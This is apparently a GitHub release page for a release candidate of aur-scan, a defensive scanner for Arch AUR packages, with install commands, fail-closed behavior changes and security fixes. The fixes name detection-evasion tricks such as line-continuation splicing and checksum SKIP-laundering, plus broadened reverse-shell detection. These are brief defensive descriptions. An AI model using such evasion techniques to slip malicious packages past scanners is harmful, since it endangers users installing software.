aur-scan 1.1.0-rc1 (release candidate)
Pre-release
Pre-release
·
61 commits
to main
since this release
v1.1.0-rc1
HxHippy
HxHippy
This tag was signed with the committer’s verified signature.
HxHippy
HxHippy
Security-hardening release candidate. Test it before it's promoted to stable.
Install (opt-in RC channel)
gpg --recv-keys 25631EAE3F43999050B7D7021132BF893C33FB51 # one-time, if your helper doesn't auto-fetch
paru -S aur-scanner-rc # or: yay -S aur-scanner-rcaur-scanner-rc builds this GPG-signed tag and conflicts with the stable
aur-scanner — install only one. Production systems should stay on
aur-scanner.
AUR channels
| Package | Channel |
|---|---|
aur-scanner / ks-aur-scanner |
Stable (recommended) |
aur-scanner-rc |
Release candidate (this build) |
aur-scanner-git |
Rolling (latest commit) |
⚠️ Behavior changes
- Fails closed. The
paru/yaywrapper and the pacman hook now deny on a
scan/fetch error, a timeout, or a non-interactive (no-TTY) prompt instead of
proceeding. If you drive an AUR helper from scripts/cron/CI, an install that
can't be fully analyzed is refused rather than silently allowed. scan --format json/sarifemit only the machine document on stdout; the
human summary moved to stderr (soaur-scan scan --format json | jqworks).
Security
Input-validation chokepoint for package names/bases, network hardening
(redirects refused, HTTPS-only, size-capped bodies, percent-encoded RPC URLs),
the pacman hook drops root before reading user caches and refuses symlinked
PKGBUILDs, detection-evasion fixes (line-continuation splicing, quote/comment-
aware brace scanning, broadened reverse-shell + crypto-address detection,
checksum SKIP-laundering), and bytes bumped to 1.11.1 (RUSTSEC-2026-0007).